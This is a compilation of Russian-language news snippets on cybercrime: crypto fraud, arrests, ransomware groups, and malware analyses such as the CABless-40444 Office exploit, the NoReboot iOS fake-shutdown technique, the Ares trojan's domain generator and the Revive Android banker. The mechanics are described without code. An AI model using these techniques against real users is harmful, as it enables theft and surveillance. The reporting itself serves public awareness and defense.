Согласно условиям кредита на $600 млн, Сальвадору было запрещено использовать эти средства для финансирования деятельности, связанной с биткоином, поскольку правительству нужно было провести существенные законодательные реформы. Это тоже требовало значительного финансирования, уверяет OCCRP.
В прошлом году правозащитная группа Cristosal уже призывала администрацию президента Найиба Букеле (Nayib Bukele) обеспечить полную прозрачность использования государственных средств, связанных с BTC. В ноябре 2022 года Cristosal инициировала против правительства Сальвадора три судебных разбирательства. Иски связаны с управлением средствами, использованными Букеле для покупок биткоинов, создания государственного криптокошелька Chivo и предполагаемой кражи личных данных более двухсот граждан, использующих Chivo.
Ранее государственный банк развития Сальвадора BANDESAL, отвечающий за торговлю биткоином, [отказался](https://bits.media/bank-razvitiya-salvadora- otkazalsya-raskryvat-antikorruptsionnomu-byuro-dannye-o-goszakupkakh-bitkoi/) раскрывать антикоррупционному бюро данные о госзакупках биткоинов.
В Подмосковье задержали 16-летнего студента техникума, который совершил кибератаку на один из крупнейших гипермаркетов страны. Об этом сообщает телеграм-канал «Осторожно, Москва». По данным следствия, подозреваемый взломал электронную систему магазина и перечислил за сутки на свой банковский счет 250 тысяч рублей.
Сотрудники гипермаркета обнаружили недостачу денег только на следующий день после взлома и обратились в полицию. По словам подростка, он учится на системного администратора в столичном техникуме. Он также признался, что ему помогали несколько его друзей.
В настоящее время подросток находится под подпиской о невыезде.
source: t.me/ostorozhno_moskva/9764
Простой студент помог преступной группировке отмыть $12,7 млн через криптовалюты, сообщила полиция Гонконга.
Старший инспектор Чу Минман (Chu Ming-man) рассказал, что деньги были переведены на счета электронных кошельков за границей, чтобы избежать обнаружения:
«Расследование показало: синдикат обрабатывал более 1 млн гонконгских долларов ($128000) в день».
Всего полиция Гонконга арестовала шесть человек. Группа подозреваемых в возрасте от 22 до 36 лет включает предполагаемого главаря, двух ключевых участников, того самого разбирающегося в криптовалюте студента и некоего сотрудника магазина часов.
«Это был хорошо организованный синдикат с четким разделением работы и использованием многоуровневых подходов для усложнения полицейского расследования», — добавил Чу Минман.
В Гонконге отмывание денег наказывается лишением свободы на срок до 14 лет и штрафом в размере 5 млн гонконгских долларов ($640000).
Недавно четыре тинейджера из столицы Великобритании получили в общей сложности 23 года тюрьмы за кражу криптовалют на $150 000. Юноши угрожали жертвам ножами, отбирали телефоны и пароли к криптокошелькам.
А недавно двое 17-летних подростков из Канады украли у гражданина США $4 млн в биткоинах и эфире, выдавая себя за работников службы поддержки криптовалютной биржи Coinbase.
Проведенный в Sophos анализ образцов вредоносных писем показал, что идея спрятать эксплойт CVE-2021-40444 в RAR-файле вполне оправдала себя. Он с успехом обходит созданный в Microsoft патч, если жертва использует WinRAR новейших версий.
Критическую RCE-уязвимость CVE-2021-40444, привязанную к движку MSHTML (его используют приложения Microsoft Office), разработчики устранили в рамках сентябрьского «вторника патчей». Злоумышленники нашли эту дыру еще до выхода заплатка; после публикации PoC атаки стали более массовыми.
Эксплойт-кампания, выявленная экспертами Sophos, оказалась на удивление скоротечной. Рассылка вредоносного спама, нацеленного на засев инфостилера Formbook, продолжалась в течение 36 часов, 24 и 25 октября, и больше не повторилась. Фальшивые сообщения были оформлены как запрос на заказ, детали и профиль мифической компании получателю предлагалось просмотреть, открыв вложение Profile.rar.
Оказалось, что в начало этого файла добавлен скрипт WSH (Windows Script Host), а заархивированный документ Word содержит встроенный OLE-объект. При его открытии пользователю предлагается включить режим редактирования и запустить активный контент.
Разбор используемого злоумышленниками эксплойта показал, что он написан на основе PoC-кода, опубликованного на GitHub. От прежних версий CVE-2021-40444 он отличается тем, что полезная нагрузка упакована не в CAB-файл (Microsoft закрыла именно эту возможность), а в умышленно искаженный RAR.
Цепочка атаки в этом случае получается совершенно иной. Обновленный эксплойт CVE-2021-40444 в Sophos нарекли CABless-40444.
Примечательно, что устаревшие версии утилиты WinRAR оказались не в состоянии открыть модифицированный архивный файл и извлечь вредоносный документ (при тестировании использовалась версия 3.61). В то же время CABless-40444 успешно отработал после установки WinRAR 6.10 beta 3.
• Source: <https://news.sophos.com/en-us/2021/12/21/attackers-test-cab- less-40444-exploit-in-a-dry-run/>
В этом году на Positive Hack Days вновь пройдет несколько мероприятий на базе Payment Village. Это больше чем просто конкурс. Участники сначала познакомятся с теорией, а затем применят полученные знания на практике: попробуют взломать банкоматы, кассы и POS-терминалы.
Все мы используем банковские карты, платежные терминалы и банкоматы каждый день, однако так мало знаем об их устройстве и различных аспектах безопасности платежного процесса. Основная задача платформы Payment Village — изменить эту ситуацию, сделать знания о платежной индустрии более доступными для энтузиастов: пользователей, исследователей, bounty hunters.
Payment Village соберет тех, кому интересны уязвимости в банковских и платежных системах, кто любит поковыряться во внутренностях банкоматов, касс самообслуживания и POS-терминалов. Здесь вы сможете узнать, как их ломают злоумышленники и как платежная индустрия их защищает.
Также в рамках Payment Village пройдут конкурсы, в ходе которых организаторы выявят и наградят самых любопытных участников конференции.
Payment Village поддержат компании IsimpleLab, «Азбука вкуса» и ARinteg.
Темы докладов этого года:
«Платформа ДБО iSimpleBank 2.0 используется для построения цифровых каналов ведущих российских коммерческих организаций, поэтому для наших клиентов безусловно важна безопасность при работе с ней. В последнее время компания iSimpleLab реализовала несколько инициатив в части организационной и регламентной безопасности, проведя для своей платформы iSimpleBank 2.0 анализ уязвимых мест по требованиям к оценочному уровню доверия не ниже чем ОУД4 в соответствии с ГОСТ Р ИСО/МЭК 15408-3-2013, а также в части полевого испытания продуктов на мероприятиях с Positive Technologies. Для нас этот вызов интересен тем, что на практике мы можем проверить и подтвердить готовность платформы противостоять реальным киберугрозам»,— рассказал Алексей Колесников, директор по продажам iSimpleLab.
Click to expand...
Задачи в этом году: взлом системы ДБО, POS-терминалов, средств защиты банкоматов, кассового оборудования.
«Так сложилось, что кассовое оборудование долго было труднодоступным для исследований на предмет уязвимостей как в онлайн-, так и в офлайн пространстве, — говорит руководитель отдела информационной безопасности „Азбуки вкуса“ Дмитрий Кузеванов. —Но в последнее время ситуация сильно изменилась: кассовые узлы все больше интегрируются с множеством внешних и внутренних сервисов: это и системы лояльности, и ERP-системы, и ФНС. Дополнительно кассы обзаводятся и периферийным оборудованием (NFC, ридеры карт, сканеры штрих- и QR-кодов), которое подключается через Bluetooth или Wi-Fi. Все это открывает много векторов атак на кассы. В Payment Village можно будет их реализовать и узнать больше о рисках и последствиях».
Click to expand...
Если у вас нет возможности принять участие офлайн, организаторы приготовили для вас небольшой сюрприз — симуляцию средств защиты банкоматов, доступную для проверки на уязвимости онлайн. Информация об этом появится в дни конференции.
Еще один сюрприз: мы разыгрываем билеты на конференцию и Payment Village среди читателей «Хакера» и энтузиастов карточных технологий. Всем желающим принять участие в розыгрыше необходимо пройти опрос. Двум авторам самых интересных ответов за неделю до конференции будут отправлены билеты!
Источник: xakep.ru/2021/05/11/payment-village/
Торговля запрещёнными веществами адаптировалась к современным технологиям, используя социальные сети и мессенджеры. Для обозначения веществ применяются эмодзи: снежинки, сердечки, виноград и другие. Такие способы коммуникации помогают скрывать незаконную деятельность.
Платформы Instagram*, Snapchat, X**, Telegram и WhatsApp всё чаще используются для сделок. Европейское агентство по наркотикам в своём [докладе](https://www.euda.europa.eu/publications/eu-drug-markets/drivers-and- facilitators/technology-and-innovation_en#box_edmrdrivers_motivations) указало на рост активности в этой сфере. По данным исследований, начатых в 2012 году, в 2021 году в Ирландии до 20% таких сделок совершались через соцсети.
Качество товаров, приобретённых онлайн, может контролироваться через отзывы пользователей, однако риски сохраняются. Ассортимент на платформах часто шире, а цены ниже, чем при традиционных сделках. Тем не менее, нет достоверных данных о безопасности таких продуктов. ООН отмечает рост использования соцсетей для розничных сделок, несмотря на преобладание уличной торговли.
В то же время соцсети предоставляют доступ к таким материалам для уязвимых групп. Управление по борьбе с наркотиками США предупреждает, что платформа позволяет крупным криминальным группировкам напрямую связываться с потребителями, что создаёт дополнительные трудности для пресечения незаконной деятельности.
Компании, владеющие социальными сетями, предпринимают меры для борьбы с нарушениями. В 2023 году Instagram и Facebook* [удалили](https://transparency.meta.com/reports/community-standards- enforcement/regulated-goods/facebook/) свыше 9 миллионов публикаций, связанных с этой темой, а Snapchat – более 240 тысяч. Однако алгоритмы иногда блокируют страницы организаций, занимающихся профилактикой и снижением вреда от запрещенных веществ.
Исследования показывают, что 60% подростков сталкивались с контентом, связанным с запрещёнными веществами, а 10% заявили о покупках через соцсети. Алгоритмы выявления таких публикаций постоянно совершенствуются, но полностью искоренить проблему пока не удаётся.
Telegram усилил политику в этой области, внедрив правила передачи данных по запросу правоохранительных органов. Обновление политики конфиденциальности повлияло на репутацию платформы как сервиса для анонимного общения – новость встревожила сообщество киберпреступников и заставила их думать над переходом на другие площадки.
Мошенничества с использованием фишинга с одобрением становятся все более распространенными и опасными методами хищения средств в криптовалютной сфере. Преступники обманным путем (Pig Butchering или romance scam) принуждают пользователей подписывать вредоносные блокчейн-транзакции, которые дают мошенникам доступ к токенам в кошельках жертв. В результате злоумышленники могут полностью опустошить кошельки своих жертв.
С начала 2021 года фишинг с одобрением (Approval phishing) уже привел к потерям в размере более 2,7 миллиардов долларов – проблема гораздо серьезнее, чем считалось ранее. Однако прозрачность блокчейна и современные аналитические инструменты предоставляют уникальные возможности для расследования, возврата активов и предотвращения преступлений.
Компания Chainalysis запустила операцию Operation Spincaster. Серия оперативных мероприятий направлена на пресечение мошенничеств путем сотрудничества между государственным и частным секторами. Chainalysis активно выявляет тысячи скомпрометированных кошельков и предоставляет информацию для оперативных действий в шести странах: США, Великобритания, Канада, Испания, Нидерланды и Австралия. В операциях приняли участие более 100 представителей из 12 государственных учреждений и 17 криптовалютных бирж.
В ходе операций участники обучались выявлению скомпрометированных кошельков и отслеживанию украденных средств. Было обнаружено более 7000 потенциальных жертв на сумму около 162 миллионов долларов. Эти данные помогли закрыть счета, конфисковать средства и собрать информацию для предотвращения будущих мошенничеств. В одном из случаев участники смогли связаться с жертвой и предупредить ее об атаке, что позволило предотвратить кражу крупной суммы.
Участники операции Spincaster также поделились своим опытом. Например, представители испанской полиции отметили, что операция принесла не только результаты по предотвращению мошенничеств, но и укрепила отношения между государственными и частными секторами для совместной борьбы с преступностью. В Великобритании выявили более 230 жертв и 33 миллиона фунтов стерлингов, связанных с фишингом с одобрением. Австралийская полиция подчеркнула важность сотрудничества с частным сектором для выявления новых тактик киберпреступников.
Криптовалютные биржи также активно участвуют в операции. Например, Binance успешно использует полученные данные для отслеживания средств, информирования пользователей и предотвращения дальнейших мошенничеств. В NDAX отметили, что совместные усилия с государственными и частными партнерами значительно повышают безопасность и доверие в криптовалютной экосистеме. Chainalysis продолжает развивать операцию Spincaster и планирует расширить ее в новые страны в ближайшие месяцы.
Chainalysis также дала рекомендации, которые необходимо учитывать в борьбе с киберпреступлениями и их предотвращением. Компания утверждает, что борьба с мошенничествами требует комплексного подхода, включающего просвещение пользователей, проактивный мониторинг транзакций и повышение возможностей правоохранительных органов в отношении инструментов аналитики и обучении.
chainalysis.com/blog/operation-spincaster/
Федеральное бюро расследований (ФБР) сообщает, что с июня 2021 года
вымогательская группировка Hive взломала более 1300 компаний и с помощью
вымогательства получила от пострадавших около 100 млн долларов.
Хуже того, правоохранители предупреждают, что операторы Hive нередко
разворачивают дополнительные полезные нагрузки других вымогателей в сетях
своих жертв, если те отказываются платить выкуп.
Свежий бюллетень
безопасности, посвященный
операциям Hive, был подготовлен специалистами ФБР, Агентства по инфраструктуре
и кибербезопасности США (CISA) и Министерства здравоохранения и социальных
служб США (HHS).
Согласно данным ФБР, среди жертв Hive числятся организации из самых разных
отраслей и секторов критической инфраструктуры, включая государственные
учреждения, телекомы и ИТ-компании, хотя чаще других хакеры атакуют
организации, работающие в сфере здравоохранения.
[](https://xakep.ru/wp-
content/uploads/2022/11/407242/Hive_ransomware_IDR_submissions.jpg)
Хотя на платформе ID Ransomware перечислены не все атаки шифровальщика Hive, с
начала текущего года жертвы действительно отправили специалистам более 850
образцов малвари. Многие из них были предоставлены после заметного всплеска
активности вымогателей, который длился с конца марта по середину апреля.
В Запорожье правоохранители обнаружили мошеннический «Call-центр», пользуясь базой данных сети интернет-магазинов, «разводил» людей на деньги через преступную схему.
Об этом сообщили в пресс-службе областной прокуратуры, передает 061.
По данным следствия, преступную схему разработали супруги из Запорожья. Для этого они привлекли других лиц и создали несколько офисов в Запорожье и Днепре, которые оснастили компьютерной техникой с соответствующим программным обеспечением. Также в их "пользовании" находилась база бывших клиентов сети интернет-магазинов по продаже товаров для здоровья. Они действовали в несколько этапов по заранее разработанной инструкции. Сначала "работник" центра звонил человеку, представлялся сотрудником исполнительной службы и предлагал получить через суд компенсацию за некачественный товар, приобретенный через интернет. Затем звонили снова, но уже от имени судебного органа или казначейства и убеждали потерпевших оплатить на подконтрольный мошенникам банковский счет "обязательный денежный сбор", якобы предусмотренный государством, за получение предложенной услуги.
В ходе санкционированных обысков изъято более 10 единиц компьютерной техники, CD - карт памяти, флеш накопители, черновые записи, в том числе со списками обманутых граждан, денежные средства и другие подтверждения преступной деятельности.
В настоящее время четырем участникам мошеннического «Call-центра» сообщено о подозрении. Им инкриминируют мошенничество, совершенное повторно, по предварительному сговору группой лиц. Им грозит от трех до восьми лет лишения свободы.
Заблокированные средства нужны компании для производства новой партии устройств.
Команда разработчиков Flipper Zero рассказала , что платежная система PayPal заблокировала бизнес-аккаунт компании по производству «тамагочи для пентестеров», и более чем на 2 месяца заморозила $1,3 млн. без объяснения причин.
Летом 2022 года Flipper Zero открыли продажи устройств. Пользователи имели возможность оплатить заказ с помощью карты или PayPal. Причем второй вариант оплаты выбирали более половины клиентов.
Через несколько дней после начала продаж PayPal запросил у разработчиков некоторые документы в рамках процесса комплаенса, которые были оперативно предоставлены Flipper Zero.
Согласно заявлению Flipper Zero, техподдержка PayPal не знает, что происходит. При этом ситуация с финансовой стороны достаточна критична. Заблокированные средства требуются компании для производства новой партии устройств.
source: twitter.com/flipper_zero/status/1567194641610465281
Двух жителей Брянской области заключили под стражу по делу об организации незаконных банковских операций за вознаграждение. Предварительно, они извлекли из этой деятельности не менее 24 млн рублей, общий оборот денежных средств превысил 220 млн рублей, сообщила во вторник пресс-служба управления МВД России по региону.
"Задержаны двое жителей Дятьковского района, которые за денежное вознаграждение осуществляли незаконные банковские операции. Фигурантам избрана мера пресечения в виде заключения под стражу", - говорится в сообщении.
Мужчины стали фигурантами уголовного дела о незаконной банковской деятельности, неправомерном обороте средств платежей и образовании юрлица через подставных лиц (ст. 172, 187 и 173.1 УК РФ).
По данным пресс-службы, подозреваемые изготавливали поддельные платежные поручения о перечислении средств между расчетными счетами, открытыми в банках на территории Брянской области. Для их обоснования вносились сведения о якобы заключенных договорах купли-продажи или оказании услуг, средства переводились на счета юридических лиц, подконтрольных фигурантам. "В результате совершения операций по обналичиванию фигуранты извлекли доход в размере не менее 24 млн рублей. Общий оборот денежных средств превысил 220 млн рублей", - добавили в сообщении.
Кроме того, сотрудники полиции провели 14 обысков и изъяли предметы и документы, имеющие доказательственное значение, в том числе $3,9 тыс. наличными, 62 тыс. рублей, бухгалтерские и налоговые документы.
source: tass.ru/proisshestviya/13918687
Исследователи в области кибербезопасности разработали новую технику, которая может применяться в атаках на владельцев смартфонов iPhone. Суть заключается в имитации выключения мобильного устройства, что позволяет вредоносу избежать удаления, а злоумышленнику — использовать микрофоны для записи и перехватывать конфиденциальные данные.
Как правило, при заражении девайса на iOS зловред можно удалить простой перезагрузкой устройства. В этом случае вредоносная программа убирается из памяти. Именно поэтому эксперты уделили внимание имитации выключения и перезагрузки, рассчитывая на то, что это поможет злонамеренному софту дольше оставаться в системе.
Свой метод атаки исследователи назвали «NoReboot», и стоит учитывать, что алгоритм не предусматривает эксплуатации каких-либо уязвимостей в мобильной операционной системе от Apple. Здесь упор сделан на обман самого пользователя, а это купертиновцы уже не могут пропатчить.
Специалисты ZecOps даже подготовили демонстрационный троян, внедряющий специальный код в три «демона» iOS и с помощью этого имитирующий выключение смартфона. Дисплей при этом становится абсолютно чёрным, камера отключается, тактильное нажатие 3D Touch ничего не даёт, звуки звонков и уведомлений отключаются, также не работает и вибрация.
PoC-трояну удаётся добраться до имитации выключения устройства благодаря перехвату сигнала, который отправляется «SpringBoard» — демону, обеспечивающему взаимодействие с пользовательским интерфейсом. Тестовый вредонос отправляет код, приводящий к принудительному завершению «SpingBoard», поэтому устройство перестаёт отвечать на действия владельца.
Далее троян доходит до демона «BackBoardd», которого заставляют отображать крутящееся колёсико (как при реальном выключении смартфона). В блоге ZecOps эксперты [опубликовали](https://blog.zecops.com/research/persistence-without- persistence-meet-the-ultimate-persistence-bug-noreboot/) видео, демонстрирующее работу тестового трояна.
Опубликованы исходные тексты инструментария ,L0phtCrack, предназначенного для восстановления паролей по хешам, в том числе задействуя GPU для ускорения подбора паролей. Код открыт под лицензиями MIT и Apache 2.0. Дополнительно опубликованы плагины для использования John the Ripper и hashcat в качестве движков для подбора паролей в L0phtCrack.
Начиная с опубликованного вчера выпуска L0phtCrack 7.2.0 продукт будет развиваться в форме открытого проекта и при участии сообщества. Привязка к коммерческим криптографическим библиотекам заменена на использование OpenSSL и LibSSH2. Среди планов по дальнейшему развитию L0phtCrack упоминается портирование кода под Linux и macOS (изначально поддерживалась только платформа Windows). Отмечается, что портирование не составит труда, так как интерфейс написан с использованием кроссплатформенной библиотеки Qt.
Продукт развивается с 1997 года и в 2004 году был продан компании Symantec, но в 2006 году выкуплен тремя основателями проекта. В 2020 году проект поглотила компания Terahash, но в июле этого года права на код были возвращены изначальным авторам из-за невыполнения обязательств по сделке. В итоге создатели L0phtCrack решили отказаться от поставки инструментария в форме проприетарного продукта и открыть исходные тексты.
Недавно операторы малвари Ragnar Locker предупреждали своих жертв, что если те свяжутся с правоохранительными органами, похищенные у них данные будут опубликованы в открытом доступе. Теперь операторы другого вымогателя, Grief, пошли еще дальше и заявили, что если жертвы наймут фирму-посредника, специализирующуюся на переговорах с вымогателями, данные этих пострадавших будут уничтожены.
Совсем недавно мы писали о том, что разработчики Ragnar Locker угрожают «слить» данные пострадавших в сеть, если те обратятся в ФБР, полицию или к частным следователям. Угроза также распространяется на тех жертв, которые обращаются к специалистам по восстановлению данных. После этого предупреждения, сделанного на прошлой неделе, операторы Ragnar Locker уже опубликовали все данные одной из своих жертв, так как пострадавшая компания наняла переговорщика.
Дело в том, что вымогатели очень не любят, когда к делу подключаются профессиональные переговорщики и правоохранительные органы. Ведь все это может привести к снижению прибыли, а также задержкам и увеличению времени, в течение которого жертва реагирует на инцидент.
Теперь к похожим угрозам прибегли и операторы малвари Grief (она же Pay or Grief). На своем сайте хакеры разместили предупреждение, которое гласит, что все данные жертвы будут удалены, если та обратится к посредникам.
[](https://xakep.ru/wp- content/uploads/2021/09/359208/grief-post.jpg)
«Мы хотим сыграть в игру. Если мы увидим профессионального переговорщика из Компании по восстановлению данных™, мы просто уничтожим [ваши] данные.
Компании по восстановлению данных™, как мы упоминали выше, получают свою оплату в любом случае. Стратегия Компаний по восстановлению данных™ состоит не в том, чтобы выплатить запрошенную сумму и не в том, чтобы раскрыть дело, но в том, чтобы затормозить [весь процесс]. Так что нам нечего терять в этом случае. Просто экономия времени для всех вовлеченных сторон.
Что заработает Компания по восстановлению данных™, если сумма выкупа не установлена, а данные просто уничтожены с нулевыми шансами на восстановление? Мы думаем — миллионы долларов. Клиенты принесут им деньги просто так. Как обычно», — пишут хакеры.Click to expand...
Издание Bleeping Computer отмечает, что этими заявлениями Grief не просто хочет оказать давление на своих жертв, но и уклониться от санкций США. Дело в том, что Grief давно связывают с русскоязычной хакерской группой Evil Corp, в отношении которой правительство США ввело санкции. То есть, запрещая жертвам нанимать специалистов, которые проводят переговоры о выкупе, хакеры надеются, что пострадавшие не узнают о рисках, связанных с санкциями, и все же заплатят требуемую сумму.
@Привет со дна, EC@
Всего за 24 часа группа скамеров, известная как Monkey Drainer, украла через
фишинг криптоактивы примерно на $1 млн. Об этом сообщил ончейн-исследователь
под ником ZachXBT.
Значительную часть потерь понесли два пользователя с Ethereum-кошельками,
которые заканчиваются на 0x02a и 0x626.
«В совокупности они потеряли $370 000, подписав транзакции на фишинговых сайтах, которыми управляет Monkey Drainer», — уточнил эксперт.
Click to expand...
Приведенные им примеры вредоносных онлайн-площадок привлекали пользователей фейковыми аирдропами находящихся сейчас на слуху проектов вроде Aptos и RTFKT.
Еще одна жертва лишилась 14 NFT, включая токены из топовых коллекций BAYC и CloneX, а также 36 000 USDC. Общая стоимость украденных активов составила ~$150 000, отметил ZachXBT.
По его словам, «к счастью», некоторые транзакции сеть отклонила, поскольку адреса скамеров были помечены.
Благодаря этому пользователь (с 0x626), у которого в кошельке хранились активы
примерно на $6,2 млн, потерял «только» ~$220 000.
Общая сумма похищенных группировкой средств превышает $3,5 млн и с каждым днем
растет, отметил эксперт.
«Пожалуйста, будьте особенно внимательны при посещении неизвестных сайтов, перед подключением кошелька и подписанием транзакций», — призвал эксперт.
Click to expand...
Банковский троян Ares, которого в Zscaler отслеживают с февраля прошлого года, получил обновления; самой приметной из новинок является генератор доменных имен, позволяющий продлить жизнь C2-серверам. Анализ показал, что алгоритм DGA идентичен тому, что некогда использовал Qakbot, однако его реализация отлична.
По словам экспертов, Ares построен на кодах Windows-троянов Kronos и Osiris (форка Kronos, использующего Tor для C2-связи). Банкер, впервые [объявившийся](https://www.zscaler.com/blogs/security-research/ares-malware- grandson-kronos-banking-trojan) в немецкоязычном спаме, активно развивается, получая новые веб-инжекты и модули (VNC, инфостилер для кражи данных из браузеров, VPN-клиентов, Filezilla, Outlook, криптокошельков).
В этом году операторы Ares [взяли тайм- аут](https://www.zscaler.com/blogs/security-research/ares-banking-trojan- learns-old-tricks-adds-defunct-qakbot-dga) с марта по август, а затем выпустили новую версию — с DGA в качестве резервного механизма связи с C2. Теперь троян вначале пускает в ход вшитые в код URL, совершая до 50 попыток подключиться к центру управления; когда эти каналы недоступны, в ход идет DGA.
Как выяснилось, таким же алгоритмом в свое время пользовался Qakbot, однако вместо заимствования кода авторы Ares создали свой — скорее всего на основе opensource-варианта генератора Qakbot, доступного на GitHub.
Доморощенная реализация позволяет новобранцу создавать 50 доменов в заданный период (150 за месяц; генератор Qakbot работал намного быстрее, выдавая 5000 результатов). Имена при этом выглядят как последовательность строчных букв (от восьми до 25, латиница), к которой добавлен TLD-домен — .com, .net, .org, .info или .biz по вшитому списку.
Создавая домены по алгоритму, Ares использует вшитое зерно и текущую дату, которую получает на порту 13/TCP с серверов американского института стандартов и технологий (time-a.nist.gov, time-a-g.nist.gov или time.nist.gov). Qakbot с той же целью обращался к публичным ресурсам — google.com, cnn.com, microsoft.com.
Исследователи также отметили, что в арсенале банкера появились дополнительные веб-инжекты. Обновления пока не спускаются в динамике с C2, но в коде свежих образцов Ares обнаружены конфигурационные данные, указывающие новую цель — банк BBVA México.
В ходе расследования атаки выяснилось, что инфраструктуру и вычислительные
мощности ДИТ нелегально использовали майнеры криптовалюты.
Хакеры атаковали серверы правительства Москвы и нарушили работу сервиса
«Московская электронная школа». Об этом сообщает «Коммерсантъ».
Согласно данным издания, сервис был недоступен с 17 сентября, а к вечеру 20 сентября основную часть проблем удалось решить. Официально чиновники заявили о технических работах, которые начались еще 17 сентября. Кроме того, сообщается, что проблема коснулась почти всех школ.
Однако эксперты на рынке информбезопасности говорят, что сбои в работе сервисов были связаны не с техническими работами, а с массовой DDoS-атакой на инфраструктуру ДИТ, а также атакой вирусов-шифровальщиков: «Сейчас зашифровано два сервера».” Сообщается, что в атаке участвовали две разные хакерские группировки, но их мотивация неизвестна.
При этом выяснилось, что злоумышленники помогли московским властям: «В рамках технических работ по устранению проблем специалисты выявили, что инфраструктуру и вычислительные мощности ДИТ нелегально использовали майнеры криптовалюты».
Как поясняет гендиректор дата-центра и облачного провайдера Oxygen Павел Кулаков, софт для майнинга криптовалюты не мог «положить» инфраструктуру, он работает в фоновом режиме, потребляя только вычислительные ресурсы. Факт работы такого ПО, по его словам, легко не заметить: «Крупные дата-центры проектируются с запасом вычислительных мощностей, а майнинговый софт потребляет малую часть».
В дикой природе обнаружен неизвестный ранее банковский троян для Android, ориентированный на клиентуру поставщика финансовых услуг BBVA. Вредонос, которого в ИБ-компании Cleafy нарекли Revive (из-за способности к перезапуску после останова), пока находится в стадии разработки и раздается только жителям Испании.
Первые атаки Revive эксперты [зафиксировали](https://www.cleafy.com/cleafy- labs/revive-from-spyware-to-android-banking-trojan) 15 июня. Зловред распространяется с поддельных сайтов BBVA (bbva.appsecureguide[.]com и bbva.european2fa[.]com) под видом программы для двухфакторной аутентификации (2FA).
Посетителя уверяют, что встроенный в банковский клиент механизм 2FA перестал удовлетворять требованиям безопасности, поэтому банк якобы создал дополнительное приложение. Чтобы повысить вероятность успеха, злоумышленники вставили на сайты видеоролик с подсказками по установке APK и выдаче разрешений.
Проведенный итальянцами анализ вредоносного кода показал сходство с opensource-шпионом [Teardroid](https://github.com/ScRiPt1337/Teardroid- phprat); создатели Revive придали ему новые механизмы, приспособив для своих нужд. От других аналогов новоявленного банкера отличает узкая специализация: его поддельные страницы заточены только под один банк, BBVA.
В настоящее время Revive способен выполнять три основные задачи:
регистрировать пользовательский ввод с помощью модуля-кейлоггера;
воровать учетные данные, используя оверлеи;
вести перехват входящих СМС-сообщений, в том числе с одноразовыми паролями и кодами 2FA, которые высылает банк.
В обеспечение этих функций зловред, как и многие собратья, запрашивает доступ к спецвозможностям Android — Accessibility Service. Из-за частых злоупотреблений Google решила ограничить доступ к Accessibility API приложениям из неофициальных источников; блокировка должна появиться с выпуском Android 13 (сейчас проходит бета-тестирование). С той же целью в этом году для программ в Google Play был введен запрет на использование Accessibility для записи телефонных звонков.
Получив разрешение на доступ к СМС и звонкам, Revive продолжает работать в фоновом режиме как простой кейлоггер — фиксирует все, что жертва вводит на экране, и периодически отсылает улов на C2. Когда пользователь входит в мобильный банк BBVA, вредонос накладывает поверх окна фишинговую страницу и крадет учетные данные, а потом отображает безликую страницу регистрации с другими ссылками — для перенаправления жертвы на легитимный сайт банка.
Из-за узкой специализации и ограниченной географии новобранец пока плохо детектируется антивирусами. Сегодня днем, 28 июня, VirusTotal показал 8/59 и 8/61 для двух образцов, раздобытых Cleafy.
10 июня в Лечче (Италия) карабинеры арестовали фальшивомонетчика и ликвидировали сложную типографию, занимающуюся подделкой денег. В результате рейда было изъято более 100 000 евро в фальшивых банкнотах и более 10 000 евро в криптовалюте. Этому предшествовали аресты покупателей крупных партий фальшивых банкнот в Италии и Франции.
Подделки находили во многих странах ЕС
Правоохранители Австрии, Франции, Германии, Италии, Люксембурга и Испании при координации Европола с февраля 2024 года пытались найти преступную группу, в которую входят еще двое обвиняемых. Фальсификаторы создали весьма убедительные подделки. Банкноты продавали через популярный шифрованный мессенджер.
В ходе рейда 10 июня была обнаружена типография, в которой подделывали банкноты евро разных номиналов (5, 10, 20 и 50). Она была оснащена инструментами и материалами, используемыми для изготовления сложнейших подделок.
Правоохранители конфисковали печатные и режущие станки, а также сырье для изготовления банкнот и их защитные элементы. Анализ, проведенный Европейским центральным банком, подтвердил: поддельные защитные элементы на банкнотах, такие как голограммы, были высокого качества. Карабинеры также конфисковали электронные устройства продавцов, как и их онлайн-канал, используемый для рекламы и продажи фальшивых банкнот.
Как считает следствие, изготовители фальшивок совершили более 170 торговых операций - покупатели могли заказывать поддельные банкноты евро различного номинала через специальный канал связи. Производители принимали оплату в криптовалюте и организовывали отправку фальшивок по почте.
europol.europa.eu/media-press/newsroom/news/sophisticated-banknote-print-shop- dismantled-in-italy
Непредвиденная щедрость
Программный сбой в Star Casino в Сиднее, в Австралии, привел к тому, что казино непреднамеренно раздавало деньги в течение нескольких недель, пишет The Register.
По ошибке было роздано 3,2 млн австралийских долларов (или $2,05 млн).
Как выяснилось, у Star Casino много лет были проблемы в соблюдением Compliance (соответствие внешним и внутренним требованиям), что могло даже поставить под сомнение его лицензию.
Как это случилось
Ошибка произошла в ПО машин «прием — выдача денег» (TICO). Их используют игроки для обмена квитанций со штрих-кодом на выигрыш в игровых автоматах.
В автоматы TICO можно вставить две квитанции и получать общую сумму сразу, пояснил менеджер казино Николас Уикс (Nicholas Weeks).
Из-за сбоя TICO возвращали один из этих билетов и позволяли использовать его повторно — штрих-код, нанесенный на нем, не распознавался как оплаченный.
«Произошло то, что из-за этого дефекта небольшие дополнительные суммы наличных денег были предоставлены клиентам в обстоятельствах, когда они не должны были получить их», — сообщил Уикс в ходе расследования.
Под «небольшими дополнительными суммами» имелись ввиду выплаты до двух тысяч австралийских долларов (или $1,29 тыс.), которые автомат мог выдать за один раз.
Сбой в программном обеспечении не могли обнаружить больше месяца. Это несмотря на то, что о наличии проблема с TICO было известно, их выявила проверка летом 2023 г.
Внутреннее расследование нового инцидента обнаружило «многочисленные сбои (человеческие и технологические), которые, более чем вероятно, помешали выявить мошенничество при более ранней возможности».
Уикс объяснил эти сбои «культурной проблемой в некоторых подразделениях казино в связи с уровнем строгости, с которой осуществляется контроль».
В отношении Star Casino было инициировано независимое расследование, так как было сочтено, что его реакция на предыдущие проверки «не оправдала ожиданий».
Выяснилось также, что системы распознавания лиц в казино не работает должным образом и не определяет изображения тех, кто должен был пройти проверку источников богатства, предназначенную выявлять случаи возможного отмывания денег. Таким образом, непроверенные личности по-прежнему могли заходить в казино и оставлять там крупные суммы денег.
Счастливчикам предъявлены обвинения
Местное издание The Sydney Morning Herald в апреле 2024 г. сообщило, что новость о «бесплатных» наличных распространилась, и минимум 43 человека воспользовались ошибкой автоматов TICO в Star Casino для снятия денег, на которые они не имели права.
Всем, кого власти смогли вычистить, предъявили обвинение.
Одним из них был выздоравливающий игроман, который «слетел с катушек» из-за открывшейся возможности не тратить свои деньги и продолжить игру.
